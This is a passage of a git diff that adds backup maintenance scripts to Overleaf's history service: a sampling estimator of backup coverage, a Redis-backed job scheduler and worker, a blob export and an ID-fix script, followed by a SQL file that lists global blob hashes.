process.exitCode = 1 + } +} +await gracefulShutdown() diff --git a/services/history-v1/storage/scripts/backup_sample.mjs b/services/history-v1/storage/scripts/backup_sample.mjs new file mode 100644 index 0000000..35ee1e9 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_sample.mjs @@ -0,0 +1,153 @@ +// @ts-check +import { ObjectId } from 'mongodb' +import { READ_PREFERENCE_SECONDARY } from '@overleaf/mongo-utils/batchedUpdate.js' +import { db, client } from '../lib/mongodb.js' + +const projectsCollection = db.collection('projects') + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +// Configuration +const SAMPLE_SIZE_PER_ITERATION = process.argv[2] + ? parseInt(process.argv[2], 10) + : 10000 +const TARGET_ERROR_PERCENTAGE = process.argv[3] + ? parseFloat(process.argv[3]) + : 5.0 + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated') +} + +async function takeSample(sampleSize) { + const results = await projectsCollection + .aggregate( + [ + { $sample: { size: sampleSize } }, + { + $match: { 'overleaf.backup.lastBackedUpVersion': { $exists: true } }, + }, + { + $count: 'total', + }, + ], + { readPreference: READ_PREFERENCE_SECONDARY } + ) + .toArray() + + const count = results[0]?.total || 0 + return { totalSampled: sampleSize, backedUp: count } +} + +function calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalPopulation +) { + const proportion = Math.max(1, cumulativeBackedUp) / cumulativeSampled + + // Standard error with finite population correction + const fpc = Math.sqrt( + (totalPopulation - cumulativeSampled) / (totalPopulation - 1) + ) + const stdError = + Math.sqrt((proportion * (1 - proportion)) / cumulativeSampled) * fpc + + // 95% confidence interval is approximately ±1.96 standard errors + const marginOfError = 1.96 * stdError + + return { + proportion, + percentage: (proportion * 100).toFixed(2), + marginOfError, + errorPercentage: (marginOfError * 100).toFixed(2), + lowerBound: ((proportion - marginOfError) * 100).toFixed(2), + upperBound: ((proportion + marginOfError) * 100).toFixed(2), + sampleSize: cumulativeSampled, + populationSize: totalPopulation, + } +} + +async function main() { + console.log('Date:', new Date().toISOString()) + const totalCount = await projectsCollection.estimatedDocumentCount({ + readPreference: READ_PREFERENCE_SECONDARY, + }) + console.log( + `Total projects in collection (estimated): ${totalCount.toLocaleString()}` + ) + console.log(`Target margin of error: ${TARGET_ERROR_PERCENTAGE}%`) + + let cumulativeSampled = 0 + let cumulativeBackedUp = 0 + let currentError = Infinity + let iteration = 0 + + console.log('Iteration | Total Sampled | % Backed Up | Margin of Error') + console.log('----------|---------------|-------------|----------------') + + while (currentError > TARGET_ERROR_PERCENTAGE) { + if (gracefulShutdownInitiated) { + console.log('Graceful shutdown initiated. Exiting sampling loop.') + break + } + + iteration++ + const { totalSampled, backedUp } = await takeSample( + SAMPLE_SIZE_PER_ITERATION + ) + cumulativeSampled += totalSampled + cumulativeBackedUp += backedUp + + const stats = calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalCount + ) + currentError = parseFloat(stats.errorPercentage) + + console.log( + `${iteration.toString().padStart(9)} | ` + + `${cumulativeSampled.toString().padStart(13)} | ` + + `${stats.percentage.padStart(10)}% | ` + + `\u00B1${stats.errorPercentage}%` + ) + + // Small delay between iterations + await new Promise(resolve => setTimeout(resolve, 100)) + } + + const finalStats = calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalCount + ) + + console.log( + `Projects sampled: ${cumulativeSampled.toLocaleString()} out of ${totalCount.toLocaleString()}` + ) + console.log( + `Estimated percentage with lastBackedUpVersion: ${finalStats.percentage}%` + ) + console.log( + `95% Confidence Interval: ${finalStats.lowerBound}% - ${finalStats.upperBound}%` + ) + console.log(`Final Margin of Error: \u00B1${finalStats.errorPercentage}%`) +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + client.close().catch(err => console.error('Error closing MongoDB:', err)) + }) diff --git a/services/history-v1/storage/scripts/backup_scheduler.mjs b/services/history-v1/storage/scripts/backup_scheduler.mjs new file mode 100644 index 0000000..3fac053 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_scheduler.mjs @@ -0,0 +1,429 @@ +import Queue from 'bull' +import config from 'config' +import commandLineArgs from 'command-line-args' +import logger from '@overleaf/logger' +import { + listPendingBackups, + listUninitializedBackups, + getBackupStatus, +} from '../lib/backup_store/index.js' + +logger.initialize('backup-queue') + +// Use the same redis config as backup_worker +const redisOptions = config.get('redis.queue') + +// Create a Bull queue named 'backup' +const backupQueue = new Queue('backup', { + redis: redisOptions, + defaultJobOptions: { + removeOnComplete: true, + removeOnFail: true, + }, +}) + +// Define command-line options +const optionDefinitions = [ + { name: 'clean', type: Boolean }, + { name: 'status', type: Boolean }, + { + name: 'add', + type: String, + multiple: true, + description: 'Project IDs or date range in YYYY-MM-DD:YYYY-MM-DD format', + }, + { name: 'monitor', type: Boolean }, + { + name: 'queue-pending', + type: Number, + description: + 'Find projects with pending changes older than N seconds and add them to the queue', + }, + { + name: 'show-pending', + type: Number, + description: + 'Show count of pending projects older than N seconds without adding to queue', + }, + { + name: 'limit', + type: Number, + description: 'Limit the number of jobs to be added', + }, + { + name: 'interval', + type: Number, + description: 'Time in seconds to spread jobs over (default: 300)', + defaultValue: 300, + }, + { + name: 'backoff-delay', + type: Number, + description: + 'Backoff delay in milliseconds for failed jobs (default: 1000)', + defaultValue: 1000, + }, + { + name: 'attempts', + type: Number, + description: 'Number of retry attempts for failed jobs (default: 3)', + defaultValue: 3, + }, + { + name: 'warn-threshold', + type: Number, + description: 'Warn about any project exceeding this pending age', + defaultValue: 2 * 3600, // 2 hours + }, + { + name: 'verbose', + alias: 'v', + type: Boolean, + description: 'Show detailed information when used with --show-pending', + }, +] + +// Parse command line arguments +const options = commandLineArgs(optionDefinitions) +const WARN_THRESHOLD = options['warn-threshold'] + +// Helper to validate date format +function isValidDateFormat(dateStr) { + return /^\d{4}-\d{2}-\d{2}$/.test(dateStr) +} + +// Helper to validate the pending time parameter +function validatePendingTime(option, value) { + if (typeof value !== 'number' || value <= 0) { + console.error( + `Error: --${option} requires a positive numeric TIME argument in seconds` + ) + console.error(`Example: --${option} 3600`) + process.exit(1) + } + return value +} + +// Helper to format the pending time display +function formatPendingTime(timestamp) { + const now = new Date() + const diffMs = now - timestamp + const seconds = Math.floor(diffMs / 1000) + return `${timestamp.toISOString()} (${seconds} seconds ago)` +} + +// Helper to add a job to the queue, checking for duplicates +async function addJobWithCheck(queue, data, options) { + const jobId = options.jobId + + // Check if the job already exists + const existingJob = await queue.getJob(jobId) + + if (existingJob) { + return { job: existingJob, added: false } + } else { + const job = await queue.add(data, options) + return { job, added: true } + } +} + +// Setup queue event listeners +function setupMonitoring() { + console.log('Starting queue monitoring. Press Ctrl+C to exit.') + + backupQueue.on('global:error', error => { + logger.info({ error }, 'Queue error') + }) + + backupQueue.on('global:waiting', jobId => { + logger.info({ jobId }, 'job is waiting') + }) + + backupQueue.on('global:active', jobId => { + logger.info({ jobId }, 'job is now active') + }) + + backupQueue.on('global:stalled', jobId => { + logger.info({ jobId }, 'job has stalled') + }) + + backupQueue.on('global:progress', (jobId, progress) => { + logger.info({ jobId, progress }, 'job progress') + }) + + backupQueue.on('global:completed', (jobId, result) => { + logger.info({ jobId, result }, 'job completed') + }) + + backupQueue.on('global:failed', (jobId, err) => { + logger.info({ jobId, err }, 'job failed') + }) + + backupQueue.on('global:paused', () => { + logger.info({}, 'Queue paused') + }) + + backupQueue.on('global:resumed', () => { + logger.info({}, 'Queue resumed') + }) + + backupQueue.on('global:cleaned', (jobs, type) => { + logger.info({ jobsCount: jobs.length, type }, 'Jobs cleaned') + }) + + backupQueue.on('global:drained', () => { + logger.info({}, 'Queue drained') + }) + + backupQueue.on('global:removed', jobId => { + logger.info({ jobId }, 'Job removed') + }) +} + +async function addDateRangeJob(input) { + const [startDate, endDate] = input.split(':') + if (!isValidDateFormat(startDate) || !isValidDateFormat(endDate)) { + console.error( + `Invalid date format for "${input}". Use YYYY-MM-DD:YYYY-MM-DD` + ) + return + } + + const jobId = `backup-${startDate}-to-${endDate}` + const { job, added } = await addJobWithCheck( + backupQueue, + { startDate, endDate }, + { jobId } + ) + + console.log( + `${added ? 'Added' : 'Already exists'}: date range backup job: ${startDate} to ${endDate}, job ID: ${job.id}` + ) +} + +// Helper to list pending and uninitialized backups +// This function combines the two cursors into a single generator +// to yield projects from both lists +async function* pendingCursor(timeIntervalMs, limit) { + for await (const project of listPendingBackups(timeIntervalMs, limit)) { + yield project + } + for await (const project of listUninitializedBackups(timeIntervalMs, limit)) { + yield project + } +} + +// Process pending projects with changes older than the specified seconds +async function processPendingProjects( + age, + showOnly, + limit, + verbose, + jobInterval, + jobOpts = {} +) { + const timeIntervalMs = age * 1000 + console.log( + `Finding projects with pending changes older than ${age} seconds${showOnly ? ' (count only)' : ''}` + ) + + let count = 0 + let addedCount = 0 + let existingCount = 0 + // Pass the limit directly to MongoDB query for better performance + const changeTimes = [] + for await (const project of pendingCursor(timeIntervalMs, limit)) { + const projectId = project._id.toHexString() + const pendingAt = + project.overleaf?.backup?.pendingChangeAt || project._id.getTimestamp() + if (pendingAt) { + changeTimes.push(pendingAt) + const pendingAge = Math.floor((Date.now() - pendingAt.getTime()) / 1000) + if (pendingAge > WARN_THRESHOLD) { + try { + const backupStatus = await getBackupStatus(projectId) + logger.warn( + { + projectId, + pendingAt, + pendingAge, + backupStatus, + warnThreshold: WARN_THRESHOLD, + }, + `pending change exceeds rpo warning threshold` + ) + } catch (err) { + logger.error( + { projectId, pendingAt, pendingAge }, + 'Error getting backup status' + ) + throw err + } + } + } + if (showOnly && verbose) { + console.log( + `Project: ${projectId} (pending since: ${formatPendingTime(pendingAt)})` + ) + } else if (!showOnly) { + const delay = Math.floor(Math.random() * jobInterval * 1000) // add random delay to avoid all jobs running simultaneously + const { job, added } = await addJobWithCheck( + backupQueue, + { projectId, pendingChangeAt: pendingAt.getTime() }, + { ...jobOpts, delay, jobId: projectId } + ) + + if (added) { + if (verbose) { + console.log( + `Added job for project: ${projectId}, job ID: ${job.id} (pending since: ${formatPendingTime(pendingAt)})` + ) + } + addedCount++ + } else { + if (verbose) { + console.log( + `Job already exists for project: ${projectId}, job ID: ${job.id} (pending since: ${formatPendingTime(pendingAt)})` + ) + } + existingCount++ + } + } + + count++ + if (count % 1000 === 0) { + console.log( + `Processed ${count} projects`, + showOnly ? '' : `(${addedCount} added, ${existingCount} existing)` + ) + } + } + // Set oldestChange to undefined if there are no changes + const oldestChange = + changeTimes.length > 0 + ? changeTimes.reduce((min, time) => (time < min ? time : min)) + : undefined + + if (showOnly) { + console.log( + `Found ${count} projects with pending changes (not added to queue)` + ) + } else { + console.log(`Found ${count} projects with pending changes:`) + console.log(` ${addedCount} jobs added to queue`) + console.log(` ${existingCount} jobs already existed in queue`) + if (oldestChange) { + console.log(` Oldest pending change: ${formatPendingTime(oldestChange)}`) + } + } +} + +// Main execution block +async function run() { + const optionCount = [ + options.clean, + options.status, + options.add, + options.monitor, + options['queue-pending'] !== undefined, + options['show-pending'] !== undefined, + ].filter(Boolean).length + if (optionCount > 1) { + console.error('Only one option can be specified') + process.exit(1) + } + + if (options.clean) { + const beforeCounts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(beforeCounts)) + console.log('Cleaning completed and failed jobs...') + await backupQueue.clean(1, 'completed') + await backupQueue.clean(1, 'failed') + const afterCounts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(afterCounts)) + console.log('Queue cleaned successfully') + } else if (options.status) { + const counts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(counts)) + } else if (options.add) { + const inputs = Array.isArray(options.add) ? options.add : [options.add] + for (const input of inputs) { + if (input.includes(':')) { + // Handle date range format + await addDateRangeJob(input) + } else { + // Handle project ID format + const { job, added } = await addJobWithCheck( + backupQueue, + { projectId: input }, + { jobId: input } + ) + console.log( + `${added ? 'Added' : 'Already exists'}: job for project: ${input}, job ID: ${job.id}` + ) + } + } + } else if (options.monitor) { + setupMonitoring() + } else if (options['queue-pending'] !== undefined) { + const age = validatePendingTime('queue-pending', options['queue-pending']) + await processPendingProjects( + age, + false, + options.limit, + options.verbose, + options.interval, + { + attempts: options.attempts, + backoff: { + type: 'exponential', + delay: options['backoff-delay'], + }, + } + ) + } else if (options['show-pending'] !== undefined) { + const age = validatePendingTime('show-pending', options['show-pending']) + await processPendingProjects(age, true, options.limit, options.verbose) + } else { + console.log('Usage:') + console.log(' --clean Clean up completed and failed jobs') + console.log(' --status Show current job counts') + console.log(' --add [projectId] Add a job for the specified projectId') + console.log( + ' --add [YYYY-MM-DD:YYYY-MM-DD] Add a job for the specified date range' + ) + console.log(' --monitor Monitor queue events') + console.log( + ' --queue-pending TIME Find projects with changes older than TIME seconds and add them to the queue' + ) + console.log( + ' --show-pending TIME Show count of pending projects older than TIME seconds' + ) + console.log(' --limit N Limit the number of jobs to be added') + console.log( + ' --interval TIME Time interval in seconds to spread jobs over' + ) + console.log( + ' --backoff-delay TIME Backoff delay in milliseconds for failed jobs (default: 1000)' + ) + console.log( + ' --attempts N Number of retry attempts for failed jobs (default: 3)' + ) + console.log( + ' --verbose, -v Show detailed information when used with --show-pending' + ) + } +} + +// Run and handle errors +run() + .catch(err => { + console.error('Error:', err) + process.exit(1) + }) + .then(result => { + // Only exit if not in monitor mode + if (!options.monitor) { + process.exit(0) + } + }) diff --git a/services/history-v1/storage/scripts/backup_worker.mjs b/services/history-v1/storage/scripts/backup_worker.mjs new file mode 100644 index 0000000..1097bb0 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_worker.mjs @@ -0,0 +1,144 @@ +import Queue from 'bull' +import logger from '@overleaf/logger' +import config from 'config' +import metrics from '@overleaf/metrics' +import { + backupProject, + initializeProjects, + configureBackup, +} from './backup.mjs' + +const CONCURRENCY = 15 +const WARN_THRESHOLD = 2 * 60 * 60 * 1000 // warn if projects are older than this +const redisOptions = config.get('redis.queue') +const JOB_TIME_BUCKETS = [10, 100, 500, 1000, 5000, 10000, 30000, 60000] // milliseconds +const LAG_TIME_BUCKETS_HRS = [ + 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.75, 2, 3, 4, 5, 6, +] // hours + +// Configure backup settings to match worker concurrency +configureBackup({ concurrency: 50, useSecondary: true }) + +// Create a Bull queue named 'backup' +const backupQueue = new Queue('backup', { + redis: redisOptions, + settings: { + lockDuration: 15 * 60 * 1000, // 15 minutes + lockRenewTime: 60 * 1000, // 1 minute + maxStalledCount: 0, // mark stalled jobs as failed + }, +}) + +// Log queue events +backupQueue.on('active', job => { + logger.debug({ job }, 'job is now active') +}) + +backupQueue.on('completed', (job, result) => { + metrics.inc('backup_worker_job', 1, { status: 'completed' }) + logger.debug({ job, result }, 'job completed') +}) + +backupQueue.on('failed', (job, err) => { + metrics.inc('backup_worker_job', 1, { status: 'failed' }) + logger.error({ job, err }, 'job failed') +}) + +backupQueue.on('waiting', jobId => { + logger.debug({ jobId }, 'job is waiting') +}) + +backupQueue.on('error', error => { + logger.error({ error }, 'queue error') +}) + +backupQueue.on('stalled', job => { + logger.error({ job }, 'job has stalled') +}) + +backupQueue.on('lock-extension-failed', (job, err) => { + logger.error({ job, err }, 'lock extension failed') +}) + +backupQueue.on('paused', () => { + logger.info('queue paused') +}) + +backupQueue.on('resumed', () => { + logger.info('queue resumed') +}) + +// Process jobs +backupQueue.process(CONCURRENCY, async job => { + const { projectId, startDate, endDate } = job.data + + if (projectId) { + return await runBackup(projectId, job.data, job) + } else if (startDate && endDate) { + return await runInit(startDate, endDate) + } else { + throw new Error('invalid job data') + } +}) + +async function runBackup(projectId, data, job) { + const { pendingChangeAt } = data + // record the time it takes to run the backup job + const timer = new metrics.Timer( + 'backup_worker_job_duration', + 1, + {}, + JOB_TIME_BUCKETS + ) + const pendingAge = Date.now() - pendingChangeAt + if (pendingAge > WARN_THRESHOLD) { + logger.warn( + { projectId, pendingAge, job }, + 'project has been pending for a long time' + ) + } + try { + logger.debug({ projectId }, 'processing backup for project') + await backupProject(projectId, {}) + metrics.inc('backup_worker_project', 1, { + status: 'success', + }) + timer.done() + // record the replication lag (time from change to backup) + if (pendingChangeAt) { + metrics.histogram( + 'backup_worker_replication_lag_in_hours', + (Date.now() - pendingChangeAt) / (3600 * 1000), + LAG_TIME_BUCKETS_HRS + ) + } + return `backup completed ${projectId}` + } catch (err) { + metrics.inc('backup_worker_project', 1, { status: 'failed' }) + logger.error({ projectId, err }, 'backup failed') + throw err // Re-throw to mark job as failed + } +} + +async function runInit(startDate, endDate) { + try { + logger.info({ startDate, endDate }, 'initializing projects') + await initializeProjects({ 'start-date': startDate, 'end-date': endDate }) + return `initialization completed ${startDate} - ${endDate}` + } catch (err) { + logger.error({ startDate, endDate, err }, 'initialization failed') + throw err + } +} + +export async function drainQueue() { + logger.info({ queue: backupQueue.name }, 'pausing queue') + await backupQueue.pause(true) // pause this worker and wait for jobs to finish + logger.info({ queue: backupQueue.name }, 'closing queue') + await backupQueue.close() +} + +export async function healthCheck() { + const count = await backupQueue.count() + metrics.gauge('backup_worker_queue_length', count) +} diff --git a/services/history-v1/storage/scripts/export_global_blobs.mjs b/services/history-v1/storage/scripts/export_global_blobs.mjs new file mode 100644 index 0000000..ccbb123 --- /dev/null +++ b/services/history-v1/storage/scripts/export_global_blobs.mjs @@ -0,0 +1,69 @@ +/** + * A script to export the global blobs from mongo to a CSV file. + * + * node storage/scripts/export_global_blobs.mjs --output global_blobs.csv + * + * The output CSV has the following format: + * + * hash,path,byteLength,stringLength,demoted + * + * hash: the hash of the blob + * path: the path of the blob in the blob store + * byteLength: the byte length of the blob, or empty if unknown + * stringLength: the string length of the blob, or empty if unknown + * demoted: true if the blob has been demoted to a reference, false otherwise + */ + +// @ts-check +import { ObjectId } from 'mongodb' +import { GLOBAL_BLOBS, loadGlobalBlobs } from '../lib/blob_store/index.js' +import { client } from '../lib/mongodb.js' +import commandLineArgs from 'command-line-args' +import fs from 'node:fs' + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +function parseArgs() { + const args = commandLineArgs([ + { + name: 'output', + type: String, + alias: 'o', + }, + ]) + const OUTPUT_STREAM = fs.createWriteStream(args['output'], { flags: 'wx' }) + + return { + OUTPUT_STREAM, + } +} + +const { OUTPUT_STREAM } = parseArgs() + +async function main() { + await loadGlobalBlobs() + OUTPUT_STREAM.write('hash,path,byteLength,stringLength,demoted\n') + for (const [hash, { blob, demoted }] of GLOBAL_BLOBS) { + const { hash: blobHash, byteLength, stringLength } = blob + if (blobHash !== hash) { + throw new Error(`hash mismatch: ${hash} !== ${blobHash}`) + } + const path = blobHash.slice(0, 2) + '/' + blobHash.slice(2) + const byteLengthStr = byteLength === null ? '' : byteLength + const stringLengthStr = stringLength === null ? '' : stringLength + OUTPUT_STREAM.write( + `${hash},${path},${byteLengthStr},${stringLengthStr},${demoted}\n` + ) + } +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + client.close().catch(err => console.error('Error closing MongoDB:', err)) + }) diff --git a/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs b/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs new file mode 100644 index 0000000..007eebe --- /dev/null +++ b/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs @@ -0,0 +1,51 @@ +// @ts-check +import { backedUpBlobs } from '../lib/mongodb.js' +import { mongoId } from '../lib/assert.js' +import { ObjectId } from 'mongodb' +import commandLineArgs from 'command-line-args' + +const STATS = { + total: 0, + replaced: 0, + skipped: 0, +} + +const config = commandLineArgs([ + { name: 'commit', type: Boolean, defaultValue: false }, +]) + +async function processRecord(record) { + STATS.total++ + try { + mongoId(record._id) + const newId = new ObjectId(record._id) + if (config.commit) { + await backedUpBlobs.updateOne( + { _id: newId }, + { + $addToSet: { blobs: { $each: record.blobs } }, + }, + { upsert: true } + ) + await backedUpBlobs.deleteOne({ _id: record._id }) + } + STATS.replaced++ + } catch (error) { + console.log(error) + STATS.skipped++ + } +} + +const cursor = backedUpBlobs + .find({ _id: { $type: 'string' } }) + .project({ _id: 1, blobs: 1 }) + +while (await cursor.hasNext()) { + const record = await cursor.next() + await processRecord(record) +} + +console.log( + `${!config.commit ? 'DRY RUN' : ''} ${STATS.total} records ${STATS.replaced} replaced, ${STATS.skipped} skipped` +) +process.exit() diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql new file mode 100644 index 0000000..05e0478 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql @@ -0,0 +1,14320 @@ +CREATE TABLE global_blob_hashes (hash_bytes bytea NOT NULL); +INSERT INTO global_blob_hashes VALUES + ('\x0002bcb29ab63cf63ea2a1184ac8fba8ad4ea85c'), + ('\x0003f8a3f3fdd378689a2b43a11645b7efab8fb3'), + ('\x000523b5135f7906791457f4d16af222daa46d81'), + ('\x000f7a0870f80279092351a62eb56b0d4ef76a61'), + ('\x00111e44854715b956d320009ce922c1aec0deb9'), + ('\x001178cfaa6539c8543a5940487ea13035ff3f4b'), + ('\x001341838be85823b4b1dbb6d05eb7cf8cae0df2'), + ('\x002147ba75e3ca66acc5a2db75a87e68c0d35b5f'), + ('\x0025e578e3aee1d8422df2baf2a8351e7bd252d5'), + ('\x0025f88e875bea45df7ebcb3fc6a035cdcfd1215'), + ('\x00309e45f488298149435a122b2de54682b0d1e2'), + ('\x0031cd62555947223cdaf48143a1c8faea181818'), + ('\x00321999b116755745f860848df5c02a46058a81'), + ('\x003cb2a8fe94990d726e7bcfd26c0a8127f37957'), + ('\x003f597aee7f69007664056b751a1cf02c20dda1'), + ('\x0042ea088fe39b2081fb3f07e9b2374128b267eb'), + ('\x004c3d06ffa20db01ed0d252edaab7742b4f9a95'), + ('\x004d63ff674404768d30de548d29483c867ee4cd'), + ('\x0050d3b0ba7d2a679a506964ade1b937436b98c6'), + ('\x005286233b4bce6ad0c0410be6aa3453fc6e913e'), + ('\x0056efbd609735712934e342450e4eef71e3d4fb'), + ('\x0066416583fa180b48503a5b590b99192860aa79'), + ('\x0067528a0634f0ae369a8c79956cd35524ad9dba'), + ('\x006c51f843374eab631493f02b06c554bf353fa5'), + ('\x007256a0c038ba0ad54d89b9b16887b24025d79a'), + ('\x0079e81766e6a62fe8903b2b13eff435dd8ce6e5'), + ('\x007a10e8b2547dfbb1742a4dacfccfa6edf0439c'), + ('\x007c52f10813305f1cc1ebcb0f32a5152c7d4320'), + ('\x008367616456f828e316fa5bd0388a8fb785b77f'), + ('\x0098f7b57075ae747b166646d42ceeb492da5599'), + ('\x009ba6e0f66a72cca1f4aadd5b3302bd4be7f5f9'), + ('\x009d53db689e7ec30b1431927433b1e377cbfcee'), + ('\x00a97b9e818f06c62eb6f1d2e26e6db5545f7053'), + ('\x00af802b66ccea4bd5fd26fad87f7f5c8c2ce265'), + ('\x00b1e1c78ac81a1dea01540232d49c813b63a759'), + ('\x00b597bd97a407d6c1b2da3828bab674ab1028b4'), + ('\x00ba1d31eb6e05f339005d02e8a196adafc8a9a4'), + ('\x00c50f568cab2ee52463bfba144c5d197128851e'), + ('\x00c9323f5a8d299bf596f409799f475f573d6cec'), + ('\x00cb3d2169a23b995bfe3de12354d07bc3c8ad7a'), + ('\x00cbcd4d1bce83a301fe3c23b51a08695a15f312'), + ('\x00d35648f8bb4ffd38fda8e4dfd88b0c64d9d1e5'), + ('\x00d45bf167505f106b89fb08671e4137aa890de3'), + ('\x00d541e8c43fd26276d24db0a17394caf3c86b88'), + ('\x00d7e3c061705c18c275f9556db792e3d38d9786'), + ('\x00db1d3c7254add7ad491c99899e36c2082d0368'), + ('\x00e5521132d65f8a2bc96f6a0411552dce27a883'), + ('\x00e6d6d53c706fe7c08a9fa02917497ff0574d19'), + ('\x00e7324096f3502f90da446a0da48e214f3369cf'), + ('\x00eb807029fbad2ce159193a6f0973700a7e7920'), + ('\x00f53cff5f50f51deafa18690ab4d9d8a826148d'), + ('\x00fbdb3662cd0d6002848c3186a28bb2a3359cce'), + ('\x00fc30636ab28039aca58a0993861050d946caa0'), + ('\x010c5f023cd050a1b5dbee5493036f20da79df67'), + ('\x011c123c620bb137b7e45b052b10a12085d18eb4'), + ('\x011e8c12452fe515b395ebb97cf732fb7cab3ff3'), + ('\x0126e37416bb49353f26841fba65a2b63972a779'), + ('\x0129ac8ed95c97949ea61e0ba69d6893be524a05'), + ('\x012dcd25c687a53c235de61d4fd6d111747a0b1d'), + ('\x013857d219e5b84a298ed1043f7d215c3befd5c2'), + ('\x013cfcab5216eefc9cfa5414834dc2d2b6076f4a'), + ('\x01426f558712caa574163575157411447c43daaa'), + ('\x0146bcf5bc55340fc4243c74dba2dd12d24b07cc'), + ('\x0150e77308b734f28a0d647eb03b1b22413b342f'), + ('\x01514983e6e74b20f1356bb166174d945ce2eb5b'), + ('\x015285953f6ddcf4470842ec0273833df231a641'), + ('\x0155d241b3065933e4cb78a992650e2c04d028db'), + ('\x015ccb14b9cf7ac6dab7fe3ec8d231fd1f3fce1f'), + ('\x0174a7b6b2f5d49a68cb03a1d1dcacafa0a77b2d'), + ('\x01777bd4404c0e62a1e44eb0d76347eb3e519fbf'), + ('\x017cfb443e51909114c214ed89647873fc7ef382'), + ('\x01811fb4e10b8115ca25604eca6080a5a931af04'), + ('\x0187f9d33de42335798e0b8246a25b09c64e5ec5'), + ('\x0194fba7c500606453112d68089bd3e550328f74'), + ('\x0195d42ae479ed9527f04c204c3f0c40045dc738'), + ('\x019ca07bb01a664ce61a9bc80e7fb8f12fba84e1'), + ('\x01a51dc7d04301ccbb98b88931edf76bcedcdfa6'), + ('\x01a89f7e73acce78c7accfdfe738c9bd7c01857d'), + ('\x01b2d98566fc53591c64133ad2465e797e471b86'), + ('\x01b334a3ca5ef49354be5de0f3f6e6fc314c56ce'), + ('\x01b6b259b94508a25da019329508fd3839f2051a'), + ('\x01b8457ad7ba46cee30683a2ee12abd26ef33f10'), + ('\x01be74110a7497182820a82281a21d8389887846'), + ('\x01c0dab906abfe8f0a4f4248b998e97a38d53502'), + ('\x01c80917548a3d847638a90ad08b31470a8db66d'), + ('\x01cc9854cd638c968aa31ab214e7ee3a94148f91'), + ('\x01d0f5bdf7695b3d6ec6f43cfb6cfbc6438af1bc'), + ('\x01dbf51cb7cb0d9291c47fa07fce308f94aa5cca'), + ('\x01eceae29193e9c2287b312987465e722ada4f6d'), + ('\x01ed6ead5962ca3febf955ba704b34c6466f4cfb'), + ('\x01eef40c1353ecb6b76d95d642171851b080b0a7'), + ('\x01f735a6f58e7b278393a55ccca8b62f3cfd1862'), + ('\x01fc91007061f339fb10983adb8c4d30f366203d'), + ('\x02020ec9648330cfe3923e3c3451c10e77f3e32a'), + ('\x02022cd1b13dd2514adfd5ad7be6fc0910752fa1'), + ('\x020299631a0ee2ed2792d271cdc5a80b055051b4'), + ('\x02050cba99a42cf5f2629207df48a2e64fc12abf'), + ('\x020588f768a515eb8da744812adf0d4bd17114b6'), + ('\x020916c6581f5e846e67c9ca3679d4b34360c8d8'), + ('\x020c4f09330504209c9edeaf1af1ea4ea5c962ee'), + ('\x020f4d75a7259924a0496e9ef514f0388f09b271'), + ('\x02144d28910833b77a98b6299012881694f58ef5'), + ('\x021b49f74992502cee66ada8650e3ccaf68f3917'), + ('\x02284cb5fb07eace3866a8d16656fcd88c176367'), + ('\x0229a9d03a0c33295340c95d464de8f1d5e97bc9'), + ('\x0231bb284b927936c82516f01b24e4d05c8d3331'), + ('\x02322c3162335e1c44b85b2d363ad4c938aab044'), + ('\x0233b1a4906f27244bd3f23ea511faa78a40d451'), + ('\x02388d7fb3d4414da87f535ac120f081b399d1b4'), + ('\x023da72cd18f2319f4afdccc4f79da20a559e8df'), + ('\x0240aba349d512ae0b8eb7382c26ba634807bd24'), + ('\x02455c15192b293936ed8e27eecf8383cabf522b'), + ('\x024745c88fe855c6c8540badd2d4b05b8a2016b3'), + ('\x0248da97307110e61ca6e48164e3662f2dd11e62'), + ('\x02493e7658699e49a4b02371142317fda8c6b4af'), + ('\x024bfab11983844b7d685ecf774dcb11af94afd3'), + ('\x024c5cf33ce75b2504e61b6f0512ea889f7df9db'), + ('\x024d5130039023726f8ba5a1ab48b42f1de784be'), + ('\x0251ab27cf867ec9dfb1f0d93c84b4662e668d67'), + ('\x0257b4fe747acf1e8584089beeb5256b5330ca7b'), + ('\x026b67c7e344979fa7171eba1a72e83198dea585'), + ('\x026f841a425b5dc4c3e9e5efa8157425c9dc3794'), + ('\x026fc481b135cdf7386ae0d14a08046795b269c9'), + ('\x0273af6ba917c0f9f5e1a836ecb88f6fbb2ecef1'), + ('\x02748d4ae22dfc9a93e69555d2d8ebbb1f37bd9f'), + ('\x027dd181fb145ee6ff2a03231ca40e4e3270a9b8'), + ('\x02828718078500fc15ebb244ec5ef09166e73480'), + ('\x02881a567ee2248d506166ae2182bb84c65deb97'), + ('\x02888c275e2d41b1213446e432bb0d2d606fd51c'), + ('\x02899c619149f488ddf6e8d1e786ba24147409f0'), + ('\x0295a5ba698f3bd7af36e3258ee7f0b33094154c'), + ('\x029cd1dd853d6b212a9c571c11967cf74330cc3a'), + ('\x029d6936c86fb21484e90479402ae96c409f2e03'), + ('\x029d7d780ea75c77d5b0a6f88862b61e99e70012'), + ('\x02a698c22cd3c1adbefa674997be2444f702880d'), + 